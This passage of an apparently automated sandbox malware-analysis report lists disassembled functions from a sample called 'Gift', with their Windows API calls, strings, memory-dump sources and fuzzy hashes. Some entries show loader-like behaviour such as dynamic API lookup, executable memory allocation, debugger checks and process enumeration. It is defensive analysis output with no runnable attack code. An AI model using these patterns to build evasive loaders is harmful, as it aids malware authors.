                                                                          Function 003572D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00357360
                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00357370
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00357395
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$MoveWindow
                                                                          • String ID: Listbox
                                                                          • API String ID: 3315199576-2633736733
                                                                          • Opcode ID: 032ac11a6eeacb8571a5933a970c2aa824998678dda397af653ead08f5e4ec4c
                                                                          • Instruction ID: a383924e4ad65f97253d79c063296743f732d14538df94d84ca4cb48aafc2523
                                                                          • Opcode Fuzzy Hash: 032ac11a6eeacb8571a5933a970c2aa824998678dda397af653ead08f5e4ec4c
                                                                          • Instruction Fuzzy Hash: 5D21BE32614118BFDF178F54EC85EBF3BAAEB89761F028124FD449B1A0C671AC559BE0
                                                                          Function 00357D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00357D97
                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00357DAC
                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00357DB9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 3850602802-1010561917
                                                                          • Opcode ID: 72785e7d95c9cb2f421e6aafbba7f96e439b1687d5e55584f4636bb84db797c2
                                                                          • Instruction ID: d16594684f8ee9520b22a5ddc53a5a210f9c85f265765fbcd4db23a33f682da4
                                                                          • Opcode Fuzzy Hash: 72785e7d95c9cb2f421e6aafbba7f96e439b1687d5e55584f4636bb84db797c2
                                                                          • Instruction Fuzzy Hash: 86110672254248BEDF269F64DC45FEB77ADEF88B14F124119FE45A60E0D672D811CB20
                                                                          Function 0030B4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0030B544: _memset.LIBCMT ref: 0030B551
                                                                            • Part of subcall function 002F0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0030B520,?,?,?,002D100A), ref: 002F0B79
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,002D100A), ref: 0030B524
                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002D100A), ref: 0030B533
                                                                          Strings
                                                                          • =7, xrefs: 0030B514
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0030B52E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=7
                                                                          • API String ID: 3158253471-1276065306
                                                                          • Opcode ID: c20c88dfe4856d3b8d9dcf2d9a9df67dcfc284e1260111badac38d639edbd5f6
                                                                          • Instruction ID: 7004fe5c6f4a385a325a1ae157d96a3db0b68a710486368212b3da24bd42ba85
                                                                          • Opcode Fuzzy Hash: c20c88dfe4856d3b8d9dcf2d9a9df67dcfc284e1260111badac38d639edbd5f6
                                                                          • Instruction Fuzzy Hash: 4BE092702113118FD332AF35E819B42BAE4AF04709F10C95EE496C6781DBB5E504CBA1
                                                                          Function 0034C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0031027A,?), ref: 0034C6E7
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0034C6F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                          • API String ID: 2574300362-1816364905
                                                                          • Opcode ID: 5faa4e1821dfdb9018250ab936ec18c77d48d217645eefafbb59af5c66ecffce
                                                                          • Instruction ID: 54e06f338bb0cbabdb5477f8cfa7183e1485398ee9e2b69360a7b462daf44d14
                                                                          • Opcode Fuzzy Hash: 5faa4e1821dfdb9018250ab936ec18c77d48d217645eefafbb59af5c66ecffce
                                                                          • Instruction Fuzzy Hash: 74E0C23C5213038FD7235B26CC4AA93BAD8FF04344F40D829E9C5D6250D7B0E8408F10
                                                                          Function 002E4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,002E4B44,?,002E49D4,?,?,002E27AF,?,00000001), ref: 002E4B85
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002E4B97
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-3689287502
                                                                          • Opcode ID: afa557265c4e7cf3962ac4265c2537b680902831dbcacd891a9a15493d908249
                                                                          • Instruction ID: 38a1bbe04fbf282235aad227f052653d84f93e07226078bde7054202efd6dfb5
                                                                          • Opcode Fuzzy Hash: afa557265c4e7cf3962ac4265c2537b680902831dbcacd891a9a15493d908249
                                                                          • Instruction Fuzzy Hash: E2D0C7348203138FDB22AF32DC0AB4776E8AF01340F50CC2ED4C2E2160E7B0E880CA00
                                                                          Function 002E4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,002E4AF7,?), ref: 002E4BB8
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002E4BCA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-1355242751
                                                                          • Opcode ID: 4f48f5e1070d858bdffb22e6d60f8093cbefbce2b894dba3188235ee8a319d62
                                                                          • Instruction ID: 278e9dc8a3a5566cbc83584483c83655e9b97328b6cb757ef63d977c27e73d57
                                                                          • Opcode Fuzzy Hash: 4f48f5e1070d858bdffb22e6d60f8093cbefbce2b894dba3188235ee8a319d62
                                                                          • Instruction Fuzzy Hash: DFD0C7348603138FD322AF32DC0AB4772EAAF02340F10CC6ED4C2D2564EBB0C890CA00
                                                                          Function 00351447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00351696), ref: 00351455
                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00351467
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: 4faeab91a6ca89b137186e379369d5917c1b25efc85567cbbc904d3915e0c5db
                                                                          • Instruction ID: 543e9ba012e7b183f32b0ff00b891a19bcde7520f36939d54c8e5c2e850643bd
                                                                          • Opcode Fuzzy Hash: 4faeab91a6ca89b137186e379369d5917c1b25efc85567cbbc904d3915e0c5db
                                                                          • Instruction Fuzzy Hash: 9BD012755207128FD7225F75C849B5776E8AF06396F11DC6AD8D6D2560D6B0D4C0C710
                                                                          Function 002E55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,002E5E3D), ref: 002E55FE
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002E5610
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                          • API String ID: 2574300362-192647395
                                                                          • Opcode ID: 8ee1d385d4f0ea46516357f2090a9e75f5a815b42ae3d1fa3ea4e0e9880ee490
                                                                          • Instruction ID: 2a9da05b0bb28db901725550078a05651118ec91685820f29fbddb3967323ea1
                                                                          • Opcode Fuzzy Hash: 8ee1d385d4f0ea46516357f2090a9e75f5a815b42ae3d1fa3ea4e0e9880ee490
                                                                          • Instruction Fuzzy Hash: FAD012789707238FD7255F31C90A65776D9AF06355F55CC29D4C6D2161D7B0C480C650
                                                                          Function 003497CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003493DE,?,00360980), ref: 003497D8
                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003497EA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                          • API String ID: 2574300362-199464113
                                                                          • Opcode ID: 1f7ab8d668a4de5c892908fc31d72e16370a3f4547c7e5afa4e846d0f306f7a5
                                                                          • Instruction ID: e4a00c307fb6ef9e7f7d79a54270a7e64471bdda7aabfe442aa768ed2d1c4342
                                                                          • Opcode Fuzzy Hash: 1f7ab8d668a4de5c892908fc31d72e16370a3f4547c7e5afa4e846d0f306f7a5
                                                                          • Instruction Fuzzy Hash: FDD017745207138FD7269F31D88A647BAE8AF05391F16CC2AD4D6E6164EBB0D880CB11
                                                                          Function 0034E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0034E7A7
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0034E7EA
                                                                            • Part of subcall function 0034DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0034DEAE
                                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0034E9EA
                                                                          • _memmove.LIBCMT ref: 0034E9FD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                                          • String ID:
                                                                          • API String ID: 3659485706-0
                                                                          • Opcode ID: 1c85b1c2c567503b115d024d1b61c67849120735f7337a81bb29c0f8c4aed04f
                                                                          • Instruction ID: a56361872e1217e4318492d9c535946ba509a8c37d0df4ce15ed20b06ab4177d
                                                                          • Opcode Fuzzy Hash: 1c85b1c2c567503b115d024d1b61c67849120735f7337a81bb29c0f8c4aed04f
                                                                          • Instruction Fuzzy Hash: 7CC15671A083019FC715DF28C48096ABBE5FF89718F14896EF8999B352D731E946CF82
                                                                          Function 0034877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 003487AD
                                                                          • CoUninitialize.OLE32 ref: 003487B8
                                                                            • Part of subcall function 0035DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00348A0E,?,00000000), ref: 0035DF71
                                                                          • VariantInit.OLEAUT32(?), ref: 003487C3
                                                                          • VariantClear.OLEAUT32(?), ref: 00348A94
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                          • String ID:
                                                                          • API String ID: 780911581-0
                                                                          • Opcode ID: e18a4fc08abd910eff2a1d26463e2a57aafa0f3e390954001f3a9941d9a8034d
                                                                          • Instruction ID: 10b5e88f40cb262a330cd6c009391923399cc2987b4bcee56eabe675bf99d288
                                                                          • Opcode Fuzzy Hash: e18a4fc08abd910eff2a1d26463e2a57aafa0f3e390954001f3a9941d9a8034d
                                                                          • Instruction Fuzzy Hash: 66A13675214B019FDB11EF14C485A2EB7E5BF88354F14884AF9969B3A2CB70FD44CB92
                                                                          Function 0032814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00363C4C,?), ref: 00328308
                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00363C4C,?), ref: 00328320
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00360988,000000FF,?,00000000,00000800,00000000,?,00363C4C,?), ref: 00328345
                                                                          • _memcmp.LIBCMT ref: 00328366
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                          • String ID:
                                                                          • API String ID: 314563124-0
                                                                          • Opcode ID: c823798e0c7cf85a975d637d9b9e42e67e14a2ce1f4e4e9f5a33b8f341414d41
                                                                          • Instruction ID: 618abf1ab94bf9271a6d7a7477ef0150dcdf5e3f0811572e12e95fb06e2c0fa8
                                                                          • Opcode Fuzzy Hash: c823798e0c7cf85a975d637d9b9e42e67e14a2ce1f4e4e9f5a33b8f341414d41
                                                                          • Instruction Fuzzy Hash: 42815A75A01219EFCB05CFD4C884EEEB7B9FF89315F248558E506AB250DB71AE06CB60
                                                                          Function 0032749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                          • String ID:
                                                                          • API String ID: 2808897238-0
                                                                          • Opcode ID: 7881e72ee6ed87b7fd9097af0e6d9a9b75555853759273c9b310274117fe7f70
                                                                          • Instruction ID: 0d1c80d1101a16d56f3a988ab6b0880ef8df000bd016dd1c3df4eebe077bceb4
                                                                          • Opcode Fuzzy Hash: 7881e72ee6ed87b7fd9097af0e6d9a9b75555853759273c9b310274117fe7f70
                                                                          • Instruction Fuzzy Hash: 8A51C9306187229BDB22AF79E895A2DF3E9BF45310F30981FE546CB6A1DF7098408B05
                                                                          Function 0034F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0034F526
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0034F534
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0034F5F4
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0034F603
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                          • String ID:
                                                                          • API String ID: 2576544623-0
                                                                          • Opcode ID: 657f9a6c316cc6fe0080faa6159d3df2cff19daa4027cd687ddda0e96da2ada4
                                                                          • Instruction ID: 0e71807dc2df87e0836f5ede854553f3a98609a1103a1cdc0b94cf41adce6067
                                                                          • Opcode Fuzzy Hash: 657f9a6c316cc6fe0080faa6159d3df2cff19daa4027cd687ddda0e96da2ada4
                                                                          • Instruction Fuzzy Hash: 49517AB1114310AFD311EF24D886E6BB7E8EF99700F50492EF995972A1EB70A914CB92
                                                                          Function 002F492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                          • Instruction ID: 16aa5916e0019d26d9d692eabbbcee2df70097de2a70d5f1928f179a2fcf3b91
                                                                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                          • Instruction Fuzzy Hash: 5E41A53172060E9BDB28AE69C8A097FF7A5AF443E0B24813DEA55C7650D7F19D608B44
                                                                          Function 0032A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0032A68A
                                                                          • __itow.LIBCMT ref: 0032A6BB
                                                                            • Part of subcall function 0032A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0032A976
                                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0032A724
                                                                          • __itow.LIBCMT ref: 0032A77B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
